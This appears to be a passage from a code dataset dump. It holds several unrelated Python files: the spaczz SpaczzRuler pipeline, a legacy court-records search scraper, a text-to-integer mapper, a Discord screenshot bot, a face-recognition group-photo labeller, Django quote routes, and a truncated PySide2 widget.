\"token\"}\n if ent_id:\n p[\"id\"] = ent_id\n all_patterns.append(p)\n return all_patterns\n\n def add_patterns(\n self: SpaczzRuler,\n patterns: Iterable[Dict[str, Any]],\n ) -> None:\n \"\"\"Add patterns to the ruler.\n\n A pattern must be a spaczz pattern:\n `{label (str), pattern (str or list), type (str),\n optional kwargs (dict[str, Any]), and optional id (str)}`.\n\n For example, a fuzzy phrase pattern:\n `{'label': 'ORG', 'pattern': 'Apple',\n 'type': 'fuzzy', 'kwargs': {'min_r2': 90}}`\n\n Or, a token pattern:\n `{'label': 'ORG', 'pattern': [{'TEXT': {'FUZZY': 'Apple'}}], 'type': 'token'}`\n\n To utilize regex flags, use inline flags.\n\n Kwarg details to be updated.\n\n Args:\n patterns: The spaczz patterns to add.\n\n Raises:\n TypeError: If patterns is not an iterable of dictionaries.\n ValueError: If one or more patterns do not conform\n the spaczz pattern structure.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> \"AUTHOR\" in ruler.labels\n True\n \"\"\"\n # disable the nlp components after this one in case\n # they hadn't been initialized / deserialised yet\n try:\n current_index = -1\n for i, (_name, pipe) in enumerate(self.nlp.pipeline):\n if self == pipe:\n current_index = i\n break\n subsequent_pipes = [\n pipe for pipe in self.nlp.pipe_names[current_index + 1 :]\n ]\n except ValueError:\n subsequent_pipes = []\n with self.nlp.select_pipes(disable=subsequent_pipes):\n token_patterns = []\n fuzzy_pattern_labels = []\n fuzzy_pattern_texts = []\n fuzzy_pattern_kwargs = []\n fuzzy_pattern_ids = []\n regex_pattern_labels = []\n regex_pattern_texts = []\n regex_pattern_kwargs = []\n regex_pattern_ids = []\n\n for entry in patterns:\n try:\n if isinstance(entry, dict):\n if entry[\"type\"] == \"fuzzy\":\n fuzzy_pattern_labels.append(entry[\"label\"])\n fuzzy_pattern_texts.append(entry[\"pattern\"])\n fuzzy_pattern_kwargs.append(entry.get(\"kwargs\", {}))\n fuzzy_pattern_ids.append(entry.get(\"id\"))\n elif entry[\"type\"] == \"regex\":\n regex_pattern_labels.append(entry[\"label\"])\n regex_pattern_texts.append(entry[\"pattern\"])\n regex_pattern_kwargs.append(entry.get(\"kwargs\", {}))\n regex_pattern_ids.append(entry.get(\"id\"))\n elif entry[\"type\"] == \"token\":\n token_patterns.append(entry)\n else:\n warnings.warn(\n f\"\"\"Spaczz pattern \"type\" must be \"fuzzy\", \"regex\",\n or \"token\", not {entry[\"type\"]}. Skipping this pattern.\n \"\"\",\n PatternTypeWarning,\n )\n else:\n raise TypeError(\n (\"Patterns must either be an iterable of dicts.\")\n )\n except KeyError:\n raise ValueError(\n (\n \"One or more patterns do not conform\",\n \"to spaczz pattern structure: \",\n \"{label (str), pattern (str or list), type (str),\",\n \"optional kwargs (dict[str, Any]),\",\n \"and optional id (str)}.\",\n )\n )\n\n fuzzy_patterns = []\n for label, pattern, kwargs, ent_id in zip(\n fuzzy_pattern_labels,\n self.nlp.pipe(fuzzy_pattern_texts),\n fuzzy_pattern_kwargs,\n fuzzy_pattern_ids,\n ):\n fuzzy_pattern = {\n \"label\": label,\n \"pattern\": pattern,\n \"kwargs\": kwargs,\n \"type\": \"fuzzy\",\n }\n if ent_id:\n fuzzy_pattern[\"id\"] = ent_id\n fuzzy_patterns.append(fuzzy_pattern)\n\n regex_patterns = []\n for label, pattern, kwargs, ent_id in zip(\n regex_pattern_labels,\n regex_pattern_texts,\n regex_pattern_kwargs,\n regex_pattern_ids,\n ):\n regex_pattern = {\n \"label\": label,\n \"pattern\": pattern,\n \"kwargs\": kwargs,\n \"type\": \"regex\",\n }\n if ent_id:\n regex_pattern[\"id\"] = ent_id\n regex_patterns.append(regex_pattern)\n\n self._add_patterns(fuzzy_patterns, regex_patterns, token_patterns)\n\n def clear(self: SpaczzRuler) -> None:\n \"\"\"Reset all patterns.\"\"\"\n self.fuzzy_patterns = nest_defaultdict(list, 2)\n self.regex_patterns = nest_defaultdict(list, 2)\n self.token_patterns = defaultdict(list)\n self._ent_ids = defaultdict(dict)\n\n def initialize(\n self: SpaczzRuler,\n get_examples: Callable[[], Iterable[Example]],\n *,\n nlp: Optional[Language] = None,\n patterns: Optional[Iterable[Dict[str, Any]]] = None,\n ) -> None:\n \"\"\"Initialize the pipe for training.\n\n Args:\n get_examples: Function that returns a representative sample\n of gold-standard Example objects.\n nlp: The current nlp object the component is part of.\n patterns: The list of patterns.\n \"\"\"\n self.clear()\n if patterns:\n self.add_patterns(patterns)\n\n def match(\n self: SpaczzRuler, doc: Doc\n ) -> Tuple[\n List[Tuple[str, int, int]],\n DefaultDict[str, Dict[Tuple[str, int, int], Any]],\n ]:\n \"\"\"Used in call to find matches in a doc.\"\"\"\n fuzzy_matches = []\n lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]] = defaultdict(dict)\n for fuzzy_match in self.fuzzy_matcher(doc):\n current_ratio = fuzzy_match[3]\n best_ratio = lookup[\"ratios\"].get(fuzzy_match[:3], 0)\n if current_ratio > best_ratio:\n fuzzy_matches.append(fuzzy_match[:3])\n lookup[\"ratios\"][fuzzy_match[:3]] = current_ratio\n regex_matches = []\n for regex_match in self.regex_matcher(doc):\n current_counts = regex_match[3]\n best_counts = lookup[\"counts\"].get(regex_match[:3])\n if not best_counts or sum(current_counts) < sum(best_counts):\n regex_matches.append(regex_match[:3])\n lookup[\"counts\"][regex_match[:3]] = current_counts\n token_matches = []\n for token_match in self.token_matcher(doc):\n token_matches.append(token_match[:3])\n lookup[\"details\"][token_match[:3]] = 1\n matches = fuzzy_matches + regex_matches + token_matches\n unique_matches, lookup = self._filter_overlapping_matches(matches, lookup)\n return unique_matches, lookup\n\n def score(self: SpaczzRuler, examples: Any, **kwargs: Any) -> Any:\n \"\"\"Pipeline scoring for spaCy compatibility.\"\"\"\n validate_examples(examples, \"SpaczzRuler.score\")\n return get_ner_prf(examples)\n\n def set_annotations(\n self: SpaczzRuler,\n doc: Doc,\n matches: List[Tuple[str, int, int]],\n lookup: DefaultDict[\n str, Dict[Tuple[str, int, int], Union[int, Tuple[int, int, int]]]\n ],\n ) -> None:\n \"\"\"Modify the document in place.\"\"\"\n entities = list(doc.ents)\n new_entities = []\n seen_tokens: Set[int] = set()\n for match_id, start, end in matches:\n if any(t.ent_type for t in doc[start:end]) and not self.overwrite:\n continue\n # check for end - 1 here because boundaries are inclusive\n if start not in seen_tokens and end - 1 not in seen_tokens:\n if match_id in self._ent_ids:\n label, ent_id = self._ent_ids[match_id]\n span = Span(doc, start, end, label=label)\n if ent_id:\n for token in span:\n token.ent_id_ = ent_id\n else:\n span = Span(doc, start, end, label=match_id)\n span = self._update_custom_attrs(span, match_id, lookup)\n new_entities.append(span)\n entities = [\n e for e in entities if not (e.start < end and e.end > start)\n ]\n seen_tokens.update(range(start, end))\n doc.ents = entities + new_entities\n\n def from_bytes(\n self: SpaczzRuler,\n patterns_bytes: bytes,\n *,\n exclude: Iterable[str] = simple_frozen_list,\n ) -> SpaczzRuler:\n \"\"\"Load the spaczz ruler from a bytestring.\n\n Args:\n patterns_bytes : The bytestring to load.\n exclude: For spaCy consistency.\n\n Returns:\n The loaded spaczz ruler.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> ruler_bytes = ruler.to_bytes()\n >>> new_ruler = SpaczzRuler(nlp)\n >>> new_ruler = new_ruler.from_bytes(ruler_bytes)\n >>> \"AUTHOR\" in new_ruler\n True\n \"\"\"\n cfg = srsly.msgpack_loads(patterns_bytes)\n self.clear()\n if isinstance(cfg, dict):\n self.add_patterns(cfg.get(\"patterns\", cfg))\n self.defaults = cfg.get(\"defaults\", {})\n if self.defaults.get(\"fuzzy_defaults\"):\n self.fuzzy_matcher = FuzzyMatcher(\n self.nlp.vocab, **self.defaults[\"fuzzy_defaults\"]\n )\n if self.defaults.get(\"regex_defaults\"):\n self.regex_matcher = RegexMatcher(\n self.nlp.vocab, **self.defaults[\"regex_defaults\"]\n )\n if self.defaults.get(\"token_defaults\"):\n self.token_matcher = TokenMatcher(\n self.nlp.vocab, **self.defaults[\"token_defaults\"]\n )\n self.overwrite = cfg.get(\"overwrite\", False)\n self.ent_id_sep = cfg.get(\"ent_id_sep\", DEFAULT_ENT_ID_SEP)\n else:\n self.add_patterns(cfg)\n return self\n\n def to_bytes(\n self: SpaczzRuler, *, exclude: Iterable[str] = simple_frozen_list\n ) -> bytes:\n \"\"\"Serialize the spaczz ruler patterns to a bytestring.\n\n Args:\n exclude: For spaCy consistency.\n\n Returns:\n The serialized patterns.\n\n Example:\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> ruler_bytes = ruler.to_bytes()\n >>> isinstance(ruler_bytes, bytes)\n True\n \"\"\"\n serial = {\n \"overwrite\": self.overwrite,\n \"ent_id_sep\": self.ent_id_sep,\n \"patterns\": self.patterns,\n \"defaults\": self.defaults,\n }\n return srsly.msgpack_dumps(serial)\n\n def from_disk(\n self: SpaczzRuler,\n path: Union[str, Path],\n *,\n exclude: Iterable[str] = simple_frozen_list,\n ) -> SpaczzRuler:\n \"\"\"Load the spaczz ruler from a file.\n\n Expects a file containing newline-delimited JSON (JSONL)\n with one entry per line.\n\n Args:\n path: The JSONL file to load.\n exclude: For spaCy consistency.\n\n Returns:\n The loaded spaczz ruler.\n\n Example:\n >>> import os\n >>> import tempfile\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> with tempfile.TemporaryDirectory() as tmpdir:\n >>> ruler.to_disk(f\"{tmpdir}/ruler\")\n >>> new_ruler = SpaczzRuler(nlp)\n >>> new_ruler = new_ruler.from_disk(f\"{tmpdir}/ruler\")\n >>> \"AUTHOR\" in new_ruler\n True\n \"\"\"\n path = ensure_path(path)\n self.clear()\n depr_patterns_path = path.with_suffix(\".jsonl\")\n if depr_patterns_path.is_file():\n patterns = srsly.read_jsonl(depr_patterns_path)\n self.add_patterns(patterns)\n else:\n cfg = {}\n deserializers_patterns = {\n \"patterns\": lambda p: self.add_patterns(\n srsly.read_jsonl(p.with_suffix(\".jsonl\"))\n )\n }\n deserializers_cfg = {\"cfg\": lambda p: cfg.update(srsly.read_json(p))}\n read_from_disk(path, deserializers_cfg, {})\n self.overwrite = cfg.get(\"overwrite\", False)\n self.defaults = cfg.get(\"defaults\", {})\n if self.defaults.get(\"fuzzy_defaults\"):\n self.fuzzy_matcher = FuzzyMatcher(\n self.nlp.vocab, **self.defaults[\"fuzzy_defaults\"]\n )\n if self.defaults.get(\"regex_defaults\"):\n self.regex_matcher = RegexMatcher(\n self.nlp.vocab, **self.defaults[\"regex_defaults\"]\n )\n if self.defaults.get(\"token_defaults\"):\n self.token_matcher = TokenMatcher(\n self.nlp.vocab, **self.defaults[\"token_defaults\"]\n )\n self.ent_id_sep = cfg.get(\"ent_id_sep\", DEFAULT_ENT_ID_SEP)\n read_from_disk(path, deserializers_patterns, {})\n return self\n\n def to_disk(\n self: SpaczzRuler,\n path: Union[str, Path],\n *,\n exclude: Iterable[str] = simple_frozen_list,\n ) -> None:\n \"\"\"Save the spaczz ruler patterns to a directory.\n\n The patterns will be saved as newline-delimited JSON (JSONL).\n\n Args:\n path: The JSONL file to save.\n exclude: For spaCy consistency.\n\n Example:\n >>> import os\n >>> import tempfile\n >>> import spacy\n >>> from spaczz.pipeline import SpaczzRuler\n >>> nlp = spacy.blank(\"en\")\n >>> ruler = SpaczzRuler(nlp)\n >>> ruler.add_patterns([{\"label\": \"AUTHOR\", \"pattern\": \"Kerouac\",\n \"type\": \"fuzzy\"}])\n >>> with tempfile.TemporaryDirectory() as tmpdir:\n >>> ruler.to_disk(f\"{tmpdir}/ruler\")\n >>> isdir = os.path.isdir(f\"{tmpdir}/ruler\")\n >>> isdir\n True\n \"\"\"\n path = ensure_path(path)\n cfg = {\n \"overwrite\": self.overwrite,\n \"defaults\": self.defaults,\n \"ent_id_sep\": self.ent_id_sep,\n }\n serializers = {\n \"patterns\": lambda p: srsly.write_jsonl(\n p.with_suffix(\".jsonl\"), self.patterns\n ),\n \"cfg\": lambda p: srsly.write_json(p, cfg),\n }\n if path.suffix == \".jsonl\": # user wants to save only JSONL\n srsly.write_jsonl(path, self.patterns)\n else:\n write_to_disk(path, serializers, {})\n\n def _add_patterns(\n self: SpaczzRuler,\n fuzzy_patterns: List[Dict[str, Any]],\n regex_patterns: List[Dict[str, Any]],\n token_patterns: List[Dict[str, Any]],\n ) -> None:\n \"\"\"Helper function for add_patterns.\"\"\"\n for entry in fuzzy_patterns + regex_patterns + token_patterns:\n label = entry[\"label\"]\n if \"id\" in entry:\n ent_label = label\n label = self._create_label(label, entry[\"id\"])\n self._ent_ids[label] = (ent_label, entry[\"id\"])\n pattern = entry[\"pattern\"]\n if isinstance(pattern, Doc):\n self.fuzzy_patterns[label][\"patterns\"].append(pattern)\n self.fuzzy_patterns[label][\"kwargs\"].append(entry[\"kwargs\"])\n elif isinstance(pattern, str):\n self.regex_patterns[label][\"patterns\"].append(pattern)\n self.regex_patterns[label][\"kwargs\"].append(entry[\"kwargs\"])\n elif isinstance(pattern, list):\n self.token_patterns[label].append(pattern)\n else:\n raise ValueError(\n (\n \"One or more patterns do not conform\",\n \"to spaczz pattern structure:\",\n \"{label (str), pattern (str or list), type (str),\",\n \"optional kwargs (dict[str, Any]),\",\n \"and optional id (str)}.\",\n )\n )\n for label, patterns in self.fuzzy_patterns.items():\n self.fuzzy_matcher.add(label, patterns[\"patterns\"], patterns[\"kwargs\"])\n for label, patterns in self.regex_patterns.items():\n self.regex_matcher.add(label, patterns[\"patterns\"], patterns[\"kwargs\"])\n for label, _token_patterns in self.token_patterns.items():\n self.token_matcher.add(label, _token_patterns)\n\n def _create_label(self: SpaczzRuler, label: str, ent_id: Union[str, None]) -> str:\n \"\"\"Join Entity label with ent_id if the pattern has an id attribute.\n\n Args:\n label: The entity label.\n ent_id: The optional entity id.\n\n Returns:\n The label and ent_id joined with configured ent_id_sep.\n \"\"\"\n if isinstance(ent_id, str):\n label = \"{}{}{}\".format(label, self.ent_id_sep, ent_id)\n return label\n\n def _split_label(self: SpaczzRuler, label: str) -> Tuple[str, Union[str, None]]:\n \"\"\"Split Entity label into ent_label and ent_id if it contains self.ent_id_sep.\n\n Args:\n label: The value of label in a pattern entry\n\n Returns:\n The separated ent_label and optional ent_id.\n \"\"\"\n if self.ent_id_sep in label:\n ent_label, ent_id = label.rsplit(self.ent_id_sep, 1)\n return ent_label, ent_id\n else:\n ent_label = label\n return ent_label, None\n\n @staticmethod\n def _filter_overlapping_matches(\n matches: List[Tuple[str, int, int]],\n lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]],\n ) -> Tuple[\n List[Tuple[str, int, int]], DefaultDict[str, Dict[Tuple[str, int, int], Any]]\n ]:\n \"\"\"Prevents multiple match spans from overlapping.\n\n Expects matches to be pre-sorted by matcher priority,\n with each matcher's matches being pre-sorted by descending length,\n then ascending start index, then descending match score\n If more than one match span includes the same tokens\n the first of these match spans in matches is kept.\n\n It also removes non-kept matches from the lookup dict as well.\n\n Args:\n matches: List of match span tuples\n (match_id, start_index, end_index).\n lookup: Match ratio, count and detail values in\n a `defaultdict(dict)`.\n\n Returns:\n The filtered list of match span tuples.\n \"\"\"\n filtered_matches: List[Tuple[str, int, int]] = []\n for match in matches:\n if not set(range(match[1], match[2])).intersection(\n chain(*[set(range(n[1], n[2])) for n in filtered_matches])\n ):\n filtered_matches.append(match)\n if match in lookup[\"ratios\"]:\n _ = lookup[\"counts\"].pop(match, None)\n _ = lookup[\"details\"].pop(match, None)\n elif match in lookup[\"counts\"]:\n _ = lookup[\"details\"].pop(match, None)\n return filtered_matches, lookup\n\n @staticmethod\n def _update_custom_attrs(\n span: Span,\n match_id: str,\n lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]],\n ) -> Span:\n \"\"\"Update custom attributes for matches.\"\"\"\n ratio = lookup[\"ratios\"].get((match_id, span.start, span.end))\n counts = lookup[\"counts\"].get((match_id, span.start, span.end))\n details = lookup[\"details\"].get((match_id, span.start, span.end))\n for token in span:\n token._.spaczz_token = True\n if ratio:\n token._.spaczz_ratio = ratio\n token._.spaczz_type = \"fuzzy\"\n elif counts:\n token._.spaczz_counts = counts\n token._.spaczz_type = \"regex\"\n elif details:\n token._.spaczz_details = details\n token._.spaczz_type = \"token\"\n return span\n","sub_path":"src/spaczz/pipeline/_spaczzruler.py","file_name":"_spaczzruler.py","file_ext":"py","file_size_in_byte":36072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"75990840","text":"#!venv/bin/python\n\n# THESE ARE LEGACY FUNCTIONS THAT ARE NOT USED IN THE WORKING APPLICATION. \n# THEY ARE STORED FOR REFERENCE AND IN CASE WE REVERT BACK TO SEARCHING FOR CASES USING THIS METHOD\n\nfrom bs4 import BeautifulSoup \nimport random \nimport pandas as pd\nimport urllib\nimport string\nimport requests\nimport time\nimport csv\n\n# Using the search page, enters combinations of year, first initial, and beginning 2 chars of last initials\n# ~170000 combinations\ndef generate_search_links():\n url_begin= \"http://www.ma-appellatecourts.org/search_party.php?pln=\"\n url_end = \"&dsc=&ddt=cr&dtp=&sort=&get=Search\"\n # last name is two chars, first name is one, year ranges from past decade\n # http://www.ma-appellatecourts.org/search_party.php?pln=jo&pfn=j&dfy=2017&dsc=&ddt=cr&dtp=&sort=&get=Search\n search_list = []\n for year in ['2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016', '2017']:\n for first_initial in string.ascii_lowercase: # A\n for last_initial_1 in string.ascii_lowercase: # A\n for last_initial_2 in string.ascii_lowercase: # a,b,c\n last_name = last_initial_1 + last_initial_2\n current_url = url_begin + last_name + \"&pfn=\" + first_initial + \"&dfy=\" + year + url_end\n search_list.append(current_url)\n print(current_url)\n return search_list\n\n# Unused: Parses through the auxiliary search page\ndef scrapable(link, headers):\n\t# result = requests.get(link)\n\tdno = link.split(\"dno=\")[1]\n\tif (dno[:2] == 'BD'):\n\t\treturn False\n\tpage = ''\n\twhile page == '':\n\t\ttry:\n\t\t\tpage = requests.get(link, headers)\n\t\t\ttime.sleep(2)\n\t\texcept:\n\t\t\tprint(\"Connection refused by the server..\")\n\t\t\tprint(\"Let me sleep for 1 seconds\")\n\t\t\tprint(\"ZZzzzz...\")\n\t\t\ttime.sleep(1)\n\t\t\tprint(\"Was a nice sleep, now let me continue...\")\n\t\t\tcontinue\n\t\t\t\n\tc = page.content\t\n\tsoup = BeautifulSoup(c,'html.parser')\n\thome = soup.find(\"td\",class_=\"home\")\n\tif (home.find(\"font\").text == 'No matches found!'):\n\t\treturn False\n\telse:\n\t\treturn True\n\n# Unused: Parses through the auxiliary search page\ndef scrapable_2(link):\n\t# result = requests.get(link)\n\tdno = link.split(\"dno=\")[1]\n\tif (dno[:2] == 'BD'): # TODO: add check for OE as well, FAR, DAR\n\t\treturn False\n\n\tpage = ''\n\twhile page == '':\n\t\ttry:\n\t\t\tpage = requests.get(link)\n\t\t\t# time.sleep(2)\n\t\texcept:\n\t\t\tprint(\"Connection refused by the server..\")\n\t\t\tprint(\"Let me sleep for 1 seconds\")\n\t\t\tprint(\"ZZzzzz...\")\n\t\t\ttime.sleep(1)\n\t\t\tprint(\"Was a nice sleep, now let me continue...\")\n\t\t\tcontinue\n\t\t\t\n\tc = page.content\t\n\tsoup = BeautifulSoup(c,'html.parser')\n\thome = soup.find(\"td\",class_=\"home\")\n\tif (home.find(\"font\") is None):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef name_scrape(url,headers):\n\n\t# http_proxy = \"192.241.129.174\"\n\t# proxyDict = {\n\t# \t\t\t\"http\" : http_proxy\n\t# \t\t}\n\tbase = \"http://www.ma-appellatecourts.org/\"\n\tbase = url[:34]\n\tpre = url[:57] + \"&psx\" + url[57:63] + \"&dfy=&dsc=&ddt=&dtp=&sort=&\"\n\tpost = \"&get=Next+List\"\n\tstill_more = True \n\n\t# http://www.ma-appellatecourts.org/search_party.php?pln=ja&psx=&pfn=j&dfy=&dsc=&ddt=&dtp=&sort=&set=0&get=Next+List\n\t# http://www.ma-appellatecourts.org/search_party.php?pln=ja&pfn=&psx=j&dfy=&dsc=&ddt=&dtp=&sort=&set=0&get=Next+List\n\n\tsearch_results = []\n\n\twhile(still_more):\n\t\tprint(url)\n\t\tstill_more = False\n\t\tpage = ''\n\t\twhile page == '':\n\t\t\ttry:\n\t\t\t\tpage = requests.get(url, headers)\n\t\t\texcept:\n\t\t\t\tprint(\"Connection refused by the server..\")\n\t\t\t\tprint(\"Let me sleep for 1 seconds\")\n\t\t\t\tprint(\"ZZzzzz...\")\n\t\t\t\ttime.sleep(1)\n\t\t\t\tprint(\"Was a nice sleep, now let me continue...\")\n\t\t\t\tcontinue\n\n\t\tc = page.content\n\t\tsoup = BeautifulSoup(c,'html.parser')\n\t\ttable = soup.find(\"table\")\n\t\tresult_table = table.find_all(\"table\", class_=\"search_result\")\n\n\t\tfor result in result_table:\n\t\t\tappend = result.a[\"href\"] \n\t\t\tlink = base + append\t\n\t\t\tprint(link)\n\t\t\tinfo = soup_scrape(link,headers)\n\t\t\tsearch_results.append(info)\n\t\t\n\t\tform = soup.find(\"form\")\n\t\tinputs = form.find_all(\"input\")\n\n\t\tfor inp in inputs :\n\t\t\tif inp[\"name\"] == \"set\":\n\t\t\t\tset_num = inp[\"value\"]\n\t\t\t\tprint(set_num)\n\t\t\tif inp[\"value\"] == \"Next List\":\n\t\t\t\tstill_more = True\n\t\t\t\tbreak\n\n\t\tif(still_more):\n\t\t\turl = pre + \"set=\" + set_num + post \n\t\n\treturn search_results","sub_path":"search_functions.py","file_name":"search_functions.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"521846833","text":"import numpy as np\n\nclass TextMap:\n\t\"\"\"\n\t\tA map of words to numbers. \n\t\tEverytime a new word -- aka word not found on dict -- is presented to get_id\n\t\ta new key of this word is created and associated with a unique integer number.\n\t\tIf a known word is presented than the number retrieved is the associated one. \n\t\"\"\"\n\tdef __init__(self, name, init_counter=1):\n\t\tself.name = name\n\t\tself.counter = init_counter\n\t\tself.map = {}\n\n\tdef increment(self):\n\t\tself.counter = self.counter + 1\n\n\tdef get_int(self):\n\t\treturn self.counter\n\n\tdef get_id(self, word):\n\t\tif word in self.map:\n\t\t\treturn self.map[word]\n\t\telse:\n\t\t\tself.map.update({ word : self.get_int() })\n\t\t\tself.increment()\n\t\t\tprint('don\\'t exist ', word, ' - ', self.map.get(word))\n\t\t\treturn self.map.get(word)\n\nclass MatrixTextToFloatConverter:\n\t\"\"\"\n\t\tTransform strings in a matrix into int numbers. Uses an internal dictionary to map words to numbers. \n\t\"\"\"\n\tdef __init__(self, original_matrix, init_index=1, exclude_columns=[]):\n\t\tself.original = original_matrix\n\t\tself.altered = []\n\t\tself.map = TextMap('MatrixTextToIntConverter', init_counter=init_index)\n\t\tself.excluded_columns = exclude_columns\n\n\n\tdef is_number(self, item):\n\t\tnumber = True\n\t\ttry:\n\t\t\tfloat(item)\n\t\texcept ValueError:\n\t\t\tnumber = False\n\t\treturn number\n\n\tdef ret(self):\n\t\treturn self.map\n\t\t\t\n\n\tdef execute(self):\n\t\titem = None\n\t\tfor row_idx, row in enumerate(self.original):\n\n\t\t\tvect = []\n\n\t\t\tfor col_idx, col in enumerate(row):\n\t\t\t\t\n\t\t\t\titem = col\n\n\t\t\t\tif not self.is_number(item) and not col_idx in self.excluded_columns:\n\t\t\t\t\titem = self.map.get_id(item)\n\n\t\t\t\tvect.append(item)\n\n\t\t\tself.altered.append(vect)\n\t\t\t\n\n\t\treturn self.altered\n\t\t\t\n\n\n\n","sub_path":"textToNumber.py","file_name":"textToNumber.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"453619361","text":"from selenium import webdriver\nfrom pathlib import Path\n\nimport time\nimport discord\nfrom discord.ext import commands\n\n\nclass Wait():\n def __init__(self):\n self.time = 0\n self.cool = 60*60\n def getWait(self):\n if (time.time() - self.time) > self.cool:\n self.time = time.time()\n return True\n else:\n return False\n\n\ntoken = 'YOUR TOKEN'\nbot = commands.Bot(command_prefix = '!')\n\n@bot.command(aliases=['v','w','vær'])\nasync def weather(ctx):\n if weit.getWait():\n await scrshot()\n with open('cap.png', 'rb') as img:\n await ctx.send(file=discord.File(img))\n\n@bot.event\nasync def on_message(message):\n print(message.content)\n await bot.process_commands(message)\n\nasync def scrshot():\n driverPath = 'C:_URPATH_\\\\geckodriver.exe'\n driver = webdriver.Firefox(executable_path=driverPath)\n cssPath = 'SOME CSS PATH TO AN ELEMENT U WANT TO CAPTURE'\n\n driver.get('SOME URL')\n elem = driver.find_element_by_css_selector(cssPath)\n elem.screenshot('cap.png')\n driver.quit()\n\nweit = Wait()\nbot.run(token)\n\n\n","sub_path":"botzo.py","file_name":"botzo.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"570104589","text":"# Import required packages\nimport face_recognition\nimport cv2\nimport numpy as np\nimport scipy.misc\nimport os\n\n# Get filenames from all pictures in the groepsfoto directory\nimage_file_names = os.listdir('./groepsfoto/')\n\n# Make a dictionay with the names of the people and their respective picture\npic_name_dict = {}\nfor img in image_file_names:\n pic_name_dict[img[:-5]] = img\n\n# Initiate empty dictionary for face encodings\nface_encodings_dict = {}\n\n# Encode known faces\nfor name in pic_name_dict:\n image = face_recognition.load_image_file(\"groepsfoto/\" + pic_name_dict[name])\n face_encodings_dict[name] = face_recognition.face_encodings(image)[0]\n\n# Save face encodings as a list\nknown_faces = [face_encodings_dict[name] for name in face_encodings_dict]\n\n# Save names as list\nname_list = list(pic_name_dict.keys())\n\n# Import group picture\nframe = face_recognition.load_image_file(\"groepsfoto.jpg\")\n\n# Find all the faces and face encodings in the current frame of video\nface_locations = face_recognition.face_locations(frame)\nface_encodings = face_recognition.face_encodings(frame, face_locations, num_jitters=5)\n\n# Add face names to the right locations based on matching with our pictures\nface_names = []\nfor face_encoding in face_encodings:\n match_scores = face_recognition.face_distance(known_faces, face_encoding)\n\n name = None\n if min(match_scores) <= 0.5: # Threshold for match\n name = name_list[np.argmin(match_scores)]\n\n face_names.append(name)\n\n# Label the results\nfor (top, right, bottom, left), name in zip(face_locations, face_names):\n if not name:\n continue\n\n # Draw a box around the face\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n # Draw a label with a name below the face\n cv2.rectangle(frame, (left, bottom - 25), (right, bottom), (0, 0, 255), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 0.5, (255, 255, 255), 1)\n\n# Display the resulting frame\nscipy.misc.toimage(frame).show()\n\n# Save resulting frame when happy\nscipy.misc.imsave('groepsfoto_FRed.png', frame)\n\n\n\n\n\n\n\n\n","sub_path":"groepsfoto_FR.py","file_name":"groepsfoto_FR.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"265220205","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns =[\n url(r'^addquote/$', views.addquote, name='addquote'),\n url(r'^getquote/$', views.getquote, name='getquote'),\n url(r'^getquotebyuser/$', views.getquotebyuser, name='getquotebyuser'),\n url(r'^getallquotesbyuser/$', views.getallquotesbyuser, name='getallquotesbyuser'),\n url(r'^deletequote/$', views.deletequote, name='deletequote'),\n url(r'^updatequote/$', views.updatequote, name='updatequote'),\n url(r'^searchquotes/$',views.searchquotes, name='searchquotes')\n ]\n","sub_path":"api/quotes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"229578506","text":"from PySide2.QtWidgets import *\nfrom PySide2.QtGui import *\nimport random\n\nclass Cycles(QWidget):\n def __init__(self):\n QWidget.__init__(self)\n self.setWindowTitle(\"Cycles de l'ISEN Yncrea Ouest\")\n self.setMinimumSize(600,400)\n self.layout = QVBoxLayout()\n self.Button=QPushButton(\"Changer le cycle\")\n\n self.text=QLabel()\n\n self.layout.addWidget(self.text)\n self.layout.addWidget(self.Button)\n\n self.Button.clicked.connect(self.randomlabel)\n\n\n self.setLayout(self.layout)\n\n\n def randomlabel(self):\n liste=[\"CSI\", \"CIR\", \"BIOST\", \"CENT\", \"BIAST\", \"EST\"]\n text=random.choice(liste)\n print(text)\n self.text.setText(text)\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app = QApplication([])\n win = Cycles()\n win.show()\n 